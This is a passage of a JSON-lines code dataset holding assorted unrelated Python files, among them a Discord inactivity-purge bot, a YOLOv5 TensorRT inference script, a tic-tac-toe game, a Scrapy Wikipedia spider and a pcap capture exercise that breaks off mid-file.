np.zeros(NUM_LOCATIONS) # NOTE: unused - number machines\nloc_waits = np.zeros(NUM_LOCATIONS) 
# NOTE: unused - voter wait times\nloc_ct = np.zeros(NUM_LOCATIONS) # NOTE: unused\n\n\nEARLY_START = 5.5 # NOTE: effectively unused\nPoll_Hours = (POLL_END - POLL_START) * 24 # NOTE: unused\nEarlyVoterHours = POLL_START - EARLY_START # NOTE: unused\n","repo_name":"AmjadRammahi/cse5911","sub_path":"code_saves/unused_globals.py","file_name":"unused_globals.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"13767433642","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[11]:\n\n\nimport numpy as np\nimport pandas as pd\nimport math\n\n#np.set_printoptions(threshold=np.inf)\n\nda = pd.read_csv('databaseAoMaAS.csv')\nta = pd.read_csv('data.tsv.csv')\nro = pd.read_csv('roles.csv', encoding = \"ISO-8859-1\")\nle = pd.read_csv('name.csv')\n\nda = da.dropna()\nta = ta.dropna()\nro = ro.dropna()\nle = le.dropna()\nda = da.groupby(['Name']).sum()\n\nro['Role No.'] = 1\nro = ro.groupby(['nconst']).sum()\nrole = pd.merge(ro,le,how='outer', on = \"nconst\")\nrole = role.drop(['nconst'], axis=1)\nrole = role.rename(index=str, columns={\"primaryName\": \"Name\"})\nrole = role.dropna()\n\ndata = pd.merge(da,ta,how='outer', on = \"Name\")\nvalues = {'primaryProfession': 'actor', 'Winner': 0}\ndata = data.fillna(value=values)\ndata = data.groupby(['Name']).mean()\n\ndatarole = pd.merge(data,role,how='outer', on = \"Name\")\ndatarole = datarole.dropna()\n\ndatarole = datarole.sort_values(by=\"Winner\", ascending = False)\n\ndisplay(datarole)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"delvecchioj/Data-Science-Project","sub_path":"Untitled.py","file_name":"Untitled.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70651866887","text":"import asyncio\nimport discord\nimport pickle\nimport os\nfrom discord.ext import commands\nfrom datetime import datetime, timedelta\nfrom random import randint\n\nfrom constantes import TOKEN #le token du bot pour se connecter à discord\n\nif os.path.exists(\"derniereActivite.p\"):\n derniereActivite = pickle.load(open(\"derniereActivite.p\", \"rb\"))\nelse:\n derniereActivite = dict()\n #dictionnaire qui à chaque membre du serveur associe sa date de dernière activité\n\ndef save():\n pickle.dump(derniereActivite, open(\"derniereActivite.p\", \"wb\"))\n\ndef ajoutActivite(idMembre, datetime, sauvegardeEnvisageable = True):\n if idMembre not in derniereActivite or datetime > derniereActivite[idMembre]:\n derniereActivite[idMembre] = datetime\n\n if sauvegardeEnvisageable and randint(0, 10) < 1: save()\n\ndef maintenant():\n return datetime.utcnow()\n\ndef main():\n bot = commands.Bot(command_prefix=\"P.\", help_command = None)\n\n @bot.event\n async def on_raw_reaction_add(payload):\n ajoutActivite(payload.user_id, maintenant())\n\n @bot.event\n async def on_message(msg):\n ajoutActivite(msg.author.id, msg.created_at)\n await bot.process_commands(msg)\n\n @bot.command(name = \"reset\")\n async def reset(ctx):\n if ctx.author.id != ctx.guild.owner_id and not ctx.author.guild_permissions.administrator: return\n await ctx.message.add_reaction(\"🕰ï¸�\")\n\n derniereActivite.clear()\n save()\n\n for salon in ctx.guild.text_channels:\n try:\n async for message in salon.history(limit = None):\n ajoutActivite(message.author.id, message.created_at, False)\n except Exception as e: #le bot n'a pas le droit de lire ce salon, on passe au suivant\n 
pass\n\n save()\n await ctx.message.add_reaction(\"👌\")\n\n @bot.command(name = \"moins_actifs\")\n async def moinsActifs(ctx):\n if ctx.author.id != ctx.guild.owner_id and not ctx.author.guild_permissions.administrator: return\n\n triParDateActivite = sorted(derniereActivite.items(), key=lambda x: x[1])\n laMaintenant = maintenant()\n\n txt = \"\"\n for idMembre, dateActivite in triParDateActivite:\n if laMaintenant - dateActivite < timedelta(days = 30):\n break #on a atteint 1 membre qui a été actif il y a moins de 30 jours\n #les suivants ont été actifs plus récément encore, donc on arrête\n else: #plus d'un mois depuis la dernière activité : danger\n try:\n membre = await ctx.guild.fetch_member(idMembre)\n except: #le membre n'existe pas : a quitté le serveur\n del derniereActivite[idMembre]\n save()\n else:\n txt += f\"{membre.nick or membre.name} - dernière activité : {dateActivite}\\n\"\n\n with open(\"rapportInactifs.txt\", \"w\") as f:\n f.write(txt)\n\n await ctx.channel.send(file = discord.File(\"rapportInactifs.txt\"))\n\n @bot.command(name = \"purgeKick\")\n async def purgeKick(ctx):\n if ctx.author.id != ctx.guild.owner_id: return\n laMaintenant = maintenant()\n\n for idMembre, dateActivite in derniereActivite.items():\n if laMaintenant - dateActivite > timedelta(days = 90): #dernière activité il y a plus de 3 mois, on purge !\n try:\n membre = await ctx.guild.fetch_member(idMembre)\n except: #le membre n'existe pas : a quitté le serveur\n pass\n else:\n await membre.kick(reason = \"Aucune activité sur le serveur depuis plus de 3 mois\")\n\n @bot.command(name = \"purgeRole\")\n async def purgeRetraitRole(ctx, roleARetirerPurge: discord.Role):\n if ctx.author.id != ctx.guild.owner_id: return\n laMaintenant = maintenant()\n\n for idMembre, dateActivite in derniereActivite.items():\n if laMaintenant - dateActivite > timedelta(days = 90): #dernière activité il y a plus de 3 mois, on purge !\n try:\n membre = await ctx.guild.fetch_member(idMembre)\n except: #le membre n'existe pas : a quitté le serveur\n pass\n else:\n await membre.remove_roles(roleARetirerPurge)\n\n loop = asyncio.get_event_loop()\n loop.create_task(bot.start(TOKEN))\n loop.run_forever()\n\nmain()\n","repo_name":"fabnem12/Bot-purge","sub_path":"bot_purge.py","file_name":"bot_purge.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8961213243","text":"from app import db\nfrom pony.orm import Required, Set\nfrom marshmallow import Schema, fields, post_load\n\nclass Product(db.Entity):\n name = Required(str)\n farm = Set('Farm')\n\nclass ProductSchema(Schema):\n id = fields.Str(dump_only=True)\n name = fields.Str(required=True)\n farms = fields.Nested('FarmSchema', many=True, exclude=('farm', 'user',))\n\n @post_load\n def load_farms(self, data):\n data['farms'] = [Product.get(id=product_id) for product_id in data['farm_ids']]\n del data['farm_ids']\n\n return data\n","repo_name":"draganceran/SEI-project-4","sub_path":"models/Product.py","file_name":"Product.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73409078729","text":"# -*- coding: utf-8 -*-\n# @Author : youngx\n# @Time : 15:05 2022-04-11\nimport glob\nimport imageio\nimport cv2\nimport os\nimport numpy as np\nimport torch\nimport torchvision\nfrom trtInference import TRT\n\n\ndef xywh2xyxy(x):\n \"\"\"\n Convert nx4 boxes from [x, y, w, h] to [x1, 
y1, x2, y2] where xy1=top-left, xy2=bottom-right\n \"\"\"\n y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)\n y[:, 0] = x[:, 0] - x[:, 2] / 2 # top left x\n y[:, 1] = x[:, 1] - x[:, 3] / 2 # top left y\n y[:, 2] = x[:, 0] + x[:, 2] / 2 # bottom right x\n y[:, 3] = x[:, 1] + x[:, 3] / 2 # bottom right y\n return y\n\n\ndef None_Max_Suppression(data, conf_thred=0.001, iou_thres=0.6):\n data = data[-1][0]\n selcect = data[:, 4] > conf_thred\n\n data = data[selcect]\n\n box = xywh2xyxy(data[:, :4])\n\n # conf = obj_conf * cls_conf\n data[:, 5:] = data[:, 5:] * data[:, 4].reshape(-1, 1)\n\n # Detections matrix n x 6 (xyxy, conf, cls)\n if True:\n i, j = (data[:, 5:] > conf_thred).nonzero()\n x = np.concatenate((box[i], data[i, j + 5, None], j[:, None]), 1)\n else:\n # best class only\n conf, j = data[:, 5:].max(1, keepdim=True)\n x = np.concatenate((box, conf, j), 1)[conf.view(-1) > conf_thres]\n\n n = x.shape[0] # number of boxes\n\n c = x[:, 5:6] * (0 if False else 0) # classes\n boxes, scores = x[:, :4] + c, x[:, 4] # boxes (offset by class), scores\n\n boxes = torch.from_numpy(boxes).float()\n scores = torch.from_numpy(scores).float()\n i = torchvision.ops.nms(boxes, scores, iou_thres) # NMS\n return x[i]\n\n\ndef SingleThread(test_image, outShape, TRT, engine, context):\n inputs_data, inputs_mem, output_data, output_mem, stream = TRT.allocate_buffers(engine)\n\n image = imageio.imread(test_image)\n image = cv2.resize(image, (640, 640))\n data = image / 255.0\n data = np.ascontiguousarray(data.transpose(2, 0, 1))\n data = np.array(data[None, :, :, :], dtype=np.float32, order='C')\n inputs_data[0] = data\n\n # # 进行推理\n TRT.Inference(engine=context, input_data=inputs_data, input_device=inputs_mem,\n out_data=output_data, out_device=output_mem,\n stream=stream)\n\n output_data = [output_data[-1]]\n for idx, pairs in enumerate(zip(output_data, [outShape[-1]])):\n data, size_shape = pairs\n totalsize = 1\n for i in list(size_shape):\n totalsize = totalsize * i\n assert totalsize == len(data), \"shape error !!!\"\n output_data[idx] = data.reshape(size_shape)\n\n # s2 = time.time()\n result = None_Max_Suppression(output_data)\n # draw bbox on images\n result = result.reshape(-1, 6)\n if len(result) > 0:\n\n box = result[:, :4]\n conf = result[:, 4]\n cls = result[:, :5]\n\n conf_gt = conf > 0.2\n conf = conf[conf_gt]\n cls = cls[conf_gt]\n box = box[conf_gt]\n for idx, item in enumerate(box):\n cls_item = cls[idx]\n cv2.rectangle(image, (int(item[0]), int(item[1])), (int(item[2]), int(item[3])), (255, 0, 0), 2)\n\n # import matplotlib.pyplot as plt\n # plt.imshow(image)\n # plt.show()\n # print(s2 - s1)\n\n\ndef main(onxpath, engine_file_path=\"\"):\n trtModel = TRT(onxpath, engine_file_path)\n engine = trtModel.build_engin()\n context = engine.create_execution_context()\n\n outShape = [\n (1, 3, 80, 80, 85),\n (1, 3, 40, 40, 85),\n (1, 3, 20, 20, 85),\n (1, 25200, 85),\n ]\n import time\n fileNames = glob.glob(\"./images/*.jpg\")\n\n t0 = time.time()\n for test_image in fileNames:\n SingleThread(test_image, outShape, trtModel, engine, context)\n te1 = time.time()\n print(\"{0} images total use time {1}, {2} fps\".format(len(fileNames), te1 - t0, len(fileNames) / (te1 - t0)))\n # from multiprocessing import Pool\n # p = Pool(1)\n # for test_image in fileNames[ :2]:\n # p.apply_async(SingleThread, args=(test_image, outShape, engine, context,))\n # p.close()\n # p.join()\n\n\nif __name__ == '__main__':\n onnx_path = \"yolov5s.onnx\"\n # onnx_path = 
\"./convert_model/multi_class_classification_sim.onnx\"\n trt_path = onnx_path.replace(\".onnx\", \"33.trt\")\n main(onnx_path, trt_path)\n","repo_name":"youngx123/tensorrt","sub_path":"trt_yolov5.py","file_name":"trt_yolov5.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17198243413","text":"# Игра\r\n\r\n# Рисуем поле\r\n\r\npole = [[\" \"] * 3 for i in range (3)]\r\ndef pole_():\r\n print()\r\n print (\" 1 2 3 \")\r\n for i, i_ in enumerate (pole):\r\n print(\" -------------\")\r\n pole_ris = f\" {i+1} | {' | '.join (i_)} | \"\r\n print(pole_ris)\r\n print(\" -------------\")\r\n\r\n# Комбинация победителя\r\n\r\ndef pobeda_():\r\n pob_kod = (((0, 0), (0, 1), (0, 2)),\r\n ((1, 0), (1, 1), (1, 2)),\r\n ((2, 0), (2, 1), (2, 2)),\r\n ((0, 2), (1, 1), (2, 0)),\r\n ((0, 0), (1, 1), (2, 2)),\r\n ((0, 0), (1, 0), (2, 0)),\r\n ((0, 1), (1, 1), (2, 1)),\r\n ((0, 2), (1, 2), (2, 2)))\r\n for kod_ in pob_kod:\r\n znak_ = []\r\n for i in kod_:\r\n znak_.append(pole[i[0]][i[1]])\r\n if znak_ == [\"X\", \"X\", \"X\"]:\r\n print(\"--------------------------------------------------------\")\r\n print(\"В ы и г р а л и г р о к с о з н а к о м !!!\")\r\n return True\r\n\r\n if znak_ == [\"O\", \"O\", \"O\"]:\r\n print(\"--------------------------------------------------------\")\r\n print(\"В ы и г р а л и г р о к с о з н а к о м !!!\")\r\n return True\r\n return False\r\npobeda_()\r\n\r\n# ВВод игроком\r\n\r\ndef vvod_():\r\n while True:\r\n vopros = \" Неверно, координаты цифрами c 1 до 3 \"\r\n koordinat_ = input(\" координаты: \").split()\r\n\r\n pobeda_()\r\n if len(koordinat_) != 2:\r\n print(vopros)\r\n continue\r\n x, y = koordinat_\r\n\r\n if not (x.isdigit()) or not (y.isdigit()):\r\n print(vopros)\r\n continue\r\n\r\n if 1 > int (x) or int (x) > 3 or int (y) < 1 or int (y) > 3:\r\n print(vopros)\r\n continue\r\n\r\n if pole[int(x)-1][int(y)-1] != \" \":\r\n print(\" данная клетка занята\")\r\n continue\r\n\r\n return x, y\r\n\r\n# Очередность хода, ничья\r\n\r\nnumber_ = 0\r\nwhile True:\r\n number_ += 1\r\n pole_()\r\n\r\n if number_ % 2 == 1:\r\n print()\r\n print(\" Очередь хода игрока со знаком X,введите\")\r\n else:\r\n print ()\r\n print (\" Очередь хода игрока со знаком O,введите\")\r\n\r\n x, y = vvod_()\r\n\r\n\r\n if number_ % 2 == 1:\r\n pole[int(x)-1][int(y)-1] = \"X\"\r\n else:\r\n pole[int(x)-1][int(y)-1] = \"O\"\r\n\r\n if pobeda_():\r\n pole_()\r\n break\r\n if number_ == 9:\r\n print (\" В этой партии победитель не выявлен.\")\r\n break\r\n\r\n\r\n\r\n","repo_name":"AlexeiValentinovich/Hello-earth-students","sub_path":"proekt.py","file_name":"proekt.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37670017753","text":"import cv2 as c\nimport numpy as np\nwidth=480\nheight=690\nvideo=c.VideoCapture(1)\n# (1088, 608)\nvideo.set(3, width)\nvideo.set(4,height)\n# video.set(10,150)\ndef order(point):\n point=point.reshape((4,2))\n newpoint=np.zeros((4,1,2),np.int32)\n add=point.sum(1)\n newpoint[0]=point[np.argmin(add)]\n newpoint[3]=point[np.argmax(add)]\n diff=np.diff(point,axis=1)\n newpoint[1]=point[np.argmin(diff)]\n newpoint[2] = point[np.argmax(diff)]\n return newpoint\n\ndef getWarp(im,big):\n # print(big.shape)\n big=order(big)\n point1=np.float32(big)\n point2=np.float32([[0,0], [width,0], [0,height], [width, height]])\n 
merge=c.getPerspectiveTransform(point1,point2)\n output=c.warpPerspective(im,merge,(480,640))\n return output\ndef contours(im):\n big = np.array([])\n max = 0\n contour, h = c.findContours(dilation, c.RETR_EXTERNAL, c.CHAIN_APPROX_NONE)\n for con in contour:\n area = c.contourArea(con)\n if area > 5000:\n lenght = c.arcLength(con, True)\n approx = c.approxPolyDP(con, 0.05 * lenght, True)\n max = len(approx)\n if area > max and len(approx) == 4:\n big = approx\n max = area\n c.drawContours(image, big, -1, (0, 0, 255), 20)\n c.imshow('document',image)\n return big\n\nwhile True:\n s,image=video.read()\n imagegray = c.cvtColor(image, c.COLOR_BGR2GRAY)\n blur=c.GaussianBlur(imagegray,(5,5),1)\n canny = c.Canny(blur,200,250)\n kernal=np.ones((5,5))\n dilation=c.dilate(canny,kernal,iterations=2)\n erode=c.erode(dilation,kernal,iterations=1)\n big=contours(erode)\n if len(big)!=0:\n wa= getWarp(image, big)\n c.imshow('Output', wa)\n if(c.waitKey(1) & 0xFF==ord('z')):\n break","repo_name":"Dhana-30/Document_Scanner","sub_path":"Document_Scanner/Document_Scanner.py","file_name":"Document_Scanner.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11248668187","text":"# Из домашнего задания на 18.12.22 - Задача 1\n# Задайте список из нескольких чисел. Напишите программу, которая найдёт сумму элементов списка, стоящих на нечётной позиции.\n# На семинаре вы говорили, что отсчет начинается с 1 (То есть в примере нечетными будут 2, 5, 3). В задании на GeekBrains отчет с 0.\n# Тут предложено оба варианта, но отсчет с 1 является главным решением.\n\n# Старое решение\n\n# table = list(map(int, input(\"Введите числа: \").split(\", \")))\n#\n# result = 0\n# for i in range(len(table)):\n# if (i + 1) % 2 == 1:\n# result += table[i]\n# # if i % 2 == 1:\n# # result += table[i]\n\n# print(result)\n\n# Новое решение. Как оказалось у меня очень мало задач для исправления. Делал что мог.\n\ntable = filter(lambda i : (i[0] + 1) % 2, list(enumerate(list(map(int, input(\"Введите числа: \").split())))))\n\nlisttuple = lambda hello : [i[1] for i in hello]\n\nprint(sum(listtuple(table)))","repo_name":"blackm1n/Homework","sub_path":"15. 
15.01.23/Problem 2.py","file_name":"Problem 2.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1845980227","text":"import pathlib\nfrom setuptools import find_packages, setup\n\nhere = pathlib.Path(__file__).parents[0]\n\nlong_description = (here / 'README.md').read_text(encoding='utf-8')\n\nsetup(\n name=\"NoodleExtensions\",\n version=\"2.1.0\",\n license='MIT license',\n description=\"Edit Beat Saber Noodle Extensions level easily using this library.\",\n long_description=long_description,\n long_description_content_type='text/markdown',\n url='https://github.com/megamaz/NoodleExtensions-python',\n author='megamaz',\n author_email=\"raphael.mazuel@gmail.com\",\n classifiers = [\n 'Development Status :: 4 - Beta',\n # 'Programming Language :: Python :: 3.8'\n 'Programming Language :: Python :: 3.9'\n ],\n keywords='Beat Saber, Noodle Extensions',\n packages=find_packages(),\n python_requires='>=3.8, <4',\n project_urls={\n 'Bug Reports': 'https://github.com/megamaz/NoodleExtensions-python/issues'\n }\n)","repo_name":"megamaz/noodleExtensions-python","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"31550108853","text":"# coding=utf-8\nimport qi\nfrom PIL import Image\n\nip = \"192.168.252.247\"\n\nsession = qi.Session()\nsession.connect(\"tcp://\" + ip + \":\" + \"9559\")\n\n\"\"\"\nСделает фотку и сохранит ее\n\nhttp://doc.aldebaran.com/2-8/naoqi/vision/alvideodevice.html\n\"\"\"\n\nvideo = session.service(\"ALVideoDevice\")\nvideoClient = video.subscribeCamera(\"myCam\", 0, 2, 11, 10)\nnaoImage = video.getImageRemote(videoClient)\nvideo.releaseImage(videoClient)\nvideo.unsubscribe(videoClient)\n\nimageWidth = naoImage[0]\nimageHeight = naoImage[1]\narray = naoImage[6]\n\nimage_string = str(bytearray(array))\n\nim = Image.frombytes(\"RGB\", (imageWidth, imageHeight), image_string)\nim.save(\"camImage.png\", \"PNG\")\n","repo_name":"Nekolone/nao_projects","sub_path":"all_projects/how_it_works/py_examples/nao_basics/nb5_make_photo.py","file_name":"nb5_make_photo.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"18655082756","text":"dataset =[]\r\n\r\ndef conv_list_toText(data):\r\n text=\"\"\r\n for a in data:\r\n text = text + \" \" + a\r\n return text\r\n\r\ndef getFeatureText(text):\r\n abc=\"\"\r\n with open('newdataset.txt') as fp:\r\n abc = fp.readlines()\r\n\r\n for i in range(len(abc)):\r\n words=abc[i].split()\r\n for word in words:\r\n dataset.append(word.lower())\r\n findings = text.split()\r\n featuretext = \"\"\r\n for wro in findings:\r\n wro = wro.lower()\r\n if wro in dataset:\r\n featuretext = featuretext+ \" \" + wro\r\n\r\n return featuretext\r\n","repo_name":"AhsanAli13503/Enhancement-of-OCR-and-Business-Document-Classification-using-Machine-Learning","sub_path":"creatingword.py","file_name":"creatingword.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14120439655","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom bs4 import BeautifulSoup\nimport requests\nfrom requests.packages.urllib3.util.retry import Retry\nfrom requests.adapters import HTTPAdapter\nfrom functions.get_request import get_request\nimport 
re\n\ndef retrive_metadata_with_doi(doi, email, timeout = (10,60)):\n output = {'error':None,\n 'status': None,\n 'xml':None}\n \n baseurl = 'https://doi.org/'\n# Create headers \n headers = {\n 'User-Agent': \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36\",\n 'Accept-Language': \"en,en-US;q=0,5\",\n 'Accept': \"text/html,application/pdf,application/xhtml+xml,application/xml,text/plain,text/xml,text/json\",\n 'mailto': email,\n 'Accept-Encoding': 'gzip, deflate, compress',\n 'Accept-Charset': 'utf-8, iso-8859-1;q=0.5, *;q=0.1'}\n# Create http session\n http = requests.Session()\n http.headers.update(headers)\n retry_strategy = Retry(\n total=3,\n status_forcelist=[500, 502, 503, 504],\n method_whitelist=[\"GET\"],\n backoff_factor=1,\n )\n adapter = HTTPAdapter(max_retries=retry_strategy)\n http.mount('', adapter)\n# Create timeout\n timeout = (10,60)\n \n url = f'{baseurl}{doi}'\n \n r = get_request(url, http, headers, timeout)\n \n output['status'] = r['status_code']\n output['error'] = r['error']\n \n if r['status_code'] == 200:\n output['xml'] = r['text']\n \n return output\n\ndef parse_fulltextlink_from_doimetadata(xml):\n soup = BeautifulSoup(xml, features=\"html.parser\")\n output = []\n \n pdfLinks = soup.find_all('meta', attrs={'name': re.compile('^citation_pdf')})\n for link in pdfLinks:\n if link.get('content') != '':\n output.append({'URL':link.get('content')\n , 'content-type':'application/pdf'\n }\n )\n\n htmlLinks = soup.find_all('meta', attrs={'name': re.compile('^citation_full')})\n for link in htmlLinks:\n if link.get('content') != '':\n output.append({'URL':link.get('content')\n , 'content-type':'text/html'\n }\n ) \n \n return output\n\ndef extract_fulltextlink_with_doi(doi, email, timeout = (10,60)):\n metadata = retrive_metadata_with_doi(doi, email, timeout = timeout)\n if metadata['xml'] != None:\n output = parse_fulltextlink_from_doimetadata(metadata['xml'])\n else:\n return None\n \n if len(output) == 0:\n return None\n \n return output\n\n","repo_name":"shihikoo/fulltext_extractor","sub_path":"functions/retrive_fulltext_with_doi.py","file_name":"retrive_fulltext_with_doi.py","file_ext":"py","file_size_in_byte":2627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2477035584","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pickle,os\nimport numpy as np\nimport tqdm\nfrom scipy import linalg,stats\nimport sys,os\nfrom os import path\n# In[2]:\n\n\n# This is based on the code found at https://gist.github.com/junpenglao/4d2669d69ddfe1d788318264cdcf0583\nwith open(sys.argv[1],'rb') as file: model,fit,opfit=pickle.load(file)\ndirectory,base=path.split(sys.argv[1])\ntry: \n\toutdirectory=sys.argv[2]\nexcept:\n\tif directory=='': outdirectory='.'\n\telse: outdirectory=directory\nos.makedirs(outdirectory,exist_ok=True)\nvars=fit.constrained_param_names()\nlogp=lambda x: fit.log_prob(fit.unconstrain_pars({var:val for var,val in zip(vars,x)}),adjust_transform=False)\n\n# In[4]:\n#result=Marginal_llk(fit,logp,vars,bounds)\nresult={}\nresult['pars']={key:fit[key] for key in fit.model_pars}\nresult['lp__']=fit['lp__']\n#result['pars']['lp__']=np.asarray([logp(point) for point in tqdm.tqdm(mtrace)])\nresult['maxposterior']=opfit\nresult['maxposterior']['lp__']=fit.log_prob(fit.unconstrain_pars({var:opfit[var] for var in opfit}),adjust_transform=True)\nwith open(path.join(outdirectory,'params_'+base),'wb') as file: 
pickle.dump(result,file)\n\n# In[ ]:\n\n\n\n\n\n","repo_name":"darcykenworthy/h0analyticcov","sub_path":"extractpars.py","file_name":"extractpars.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"40099222253","text":"from scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors.lxmlhtml import LxmlLinkExtractor\nfrom scrapy.item import Item, Field\nimport modify_query\n\nclass url_item(Item):\n url= Field()\n keywords = Field()\n title = Field()\n linksTo = Field()\n\nclass axxelerate_spider(CrawlSpider):\n name = 'axxelerate'\n allowed_domains = ['en.wikipedia.org']\n start_urls = ['https://en.wikipedia.org/wiki/Main_Page']\n rules = (Rule(LxmlLinkExtractor(allow=(allowed_domains)), callback='parse_obj', follow=True),)\n\n def parse_obj(self,response):\n item = url_item()\n item['url'] = response.url\n item['keywords'] = []\n tags = [\"h1\", \"title\", \"article\", \"div\", \"blockquote\", \"td\", \"li\", \"p\", \"span\", \"strong\", \"b\", \"i\"]\n for tag in tags:\n texts = response.xpath(\"//%s/text()\" % (tag)).extract()\n for text in texts:\n text = text.encode(\"latin1\", \"ignore\")\n result = modify_query.query(text)\n item['keywords'] = item['keywords'] + result\n item['title'] = response.xpath(\"//title/text()\").extract_first()\n item['keywords'] = set(item['keywords'])\n item['linksTo'] = []\n for link in LxmlLinkExtractor(allow=(),deny = ()).extract_links(response):\n if link.url.startswith('https://en.wikipedia.org'):\n item['linksTo'].append(link.url)\n return item\n","repo_name":"vipulroxx/Axxelerate","sub_path":"axxelerate/axxelerate/spiders/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"74141517449","text":"# Написати скрипт, який приймає від користувача два числа (int або float) і робить наступне:\n# Кожне введене значення спочатку пробує перевести в int. У разі помилки - пробує перевести в float, а якщо і там ловить\n# помилку - пропонує ввести значення ще раз (зручніше на даному етапі навчання для цього використати цикл while)\n# Виводить результат ділення першого на друге. 
Якщо при цьому виникає помилка - оброблює її і виводить відповідне\n# повідомлення\n\ninput_needed = True\nfirst_number, second_number = \"\", \"\"\nwhile input_needed:\n print_text = \"\"\n first_number = input(\"Input first number: \")\n second_number = input(\"Input second number: \")\n\n try:\n int(first_number)\n int(second_number)\n except ValueError:\n try:\n float(first_number)\n float(second_number)\n except ValueError:\n print_text = \"Entered incorrect type, try again\"\n else:\n input_needed = False\n print_text = \"At least one of entered values is float\"\n else:\n input_needed = False\n print_text = \"Both entered values are integer\"\n print(print_text)\n\ntry:\n print(f\"{first_number} / {second_number} = {float(first_number) / float(second_number)}\")\nexcept Exception as e:\n print(f\"Error: {e}\")\n","repo_name":"vkovalchuk-91/Python_GeekHub","sub_path":"HT_04/task_01.py","file_name":"task_01.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72315162568","text":"'''\r\n practica1.py\r\n Muestra el tiempo de llegada de los primeros 50 paquetes a la interfaz especificada\r\n como argumento y los vuelca a traza nueva con tiempo actual\r\n\r\n Autor: Javier Ramos \r\n 2019 EPS-UAM\r\n'''\r\n\r\nfrom rc1_pcap import *\r\nimport sys\r\nimport binascii\r\nimport signal\r\nimport argparse\r\nfrom argparse import RawTextHelpFormatter\r\nimport time\r\nimport logging\r\n\r\nETH_FRAME_MAX = 1514\r\nPROMISC = 1\r\nNO_PROMISC = 0\r\nTO_MS = 10\r\nnum_paquete = 0\r\nTIME_OFFSET = 30*60\r\nflag = 0\r\n\r\ndef signal_handler(nsignal,frame):\r\n\tlogging.info('Control C pulsado')\r\n\tif handle:\r\n\t\tpcap_breakloop(handle)\r\n\t\t\r\n\r\ndef procesa_paquete(us,header,data):\r\n\tglobal num_paquete, pdumper, flag\r\n\theader.ts.tv_sec = header.ts.tv_sec + 1800\r\n\tlogging.info('Nuevo paquete de {} bytes capturado a las {}.{}'.format(header.len,header.ts.tv_sec,header.ts.tv_usec))\r\n\tnum_paquete += 1\r\n\t\r\n\tn = args.nbytes\r\n\tif header.len < n:\r\n\t\tn = header.len\r\n\tlogging.info(\"Primeros bytes del paquete: \" + \" \".join('{:02x}'.format(c) for c in data[:n]))\r\n\t\r\n\r\n\tif flag ==1:\r\n\t\tpcap_dump(pdumper, header, data)\r\n\t\r\nif __name__ == \"__main__\":\r\n\tglobal pdumper,args,handle\r\n\tfile_descripter = 0\r\n\r\n\tsignal.signal(signal.SIGINT, signal_handler)\r\n\t\r\n\tparser = argparse.ArgumentParser(description='Captura trafico de una interfaz ( o lee de fichero) y muestra la longitud y timestamp de los 50 primeros paquetes',\r\n\tformatter_class=RawTextHelpFormatter)\r\n\tparser.add_argument('--file', dest='tracefile', default=False,help='Fichero pcap a abrir')\r\n\tparser.add_argument('--itf', dest='interface', default=False,help='Interfaz a abrir')\r\n\tparser.add_argument('--nbytes', dest='nbytes', type=int, default=14,help='Numero de bytes a mostrar por paquete')\r\n\tparser.add_argument('--debug', dest='debug', default=False, action='store_true',help='Activar Debug messages')\r\n\targs = parser.parse_args()\r\n\r\n\r\n\tif len(sys.argv) <= 1:\r\n\t\tparser.print_help()\r\n\t\tsys.exit(-1)\r\n\r\n\tif args.debug:\r\n\t\tlogging.basicConfig(level = logging.DEBUG, format = '[%(asctime)s %(levelname)s]\\t%(message)s')\r\n\telse:\r\n\t\tlogging.basicConfig(level = logging.INFO, format = '[%(asctime)s %(levelname)s]\\t%(message)s')\r\n\r\n\t\r\n\t\r\n\r\n\tif args.tracefile is False and args.interface is False:\r\n\r\n\t\tlogging.error('No se ha 
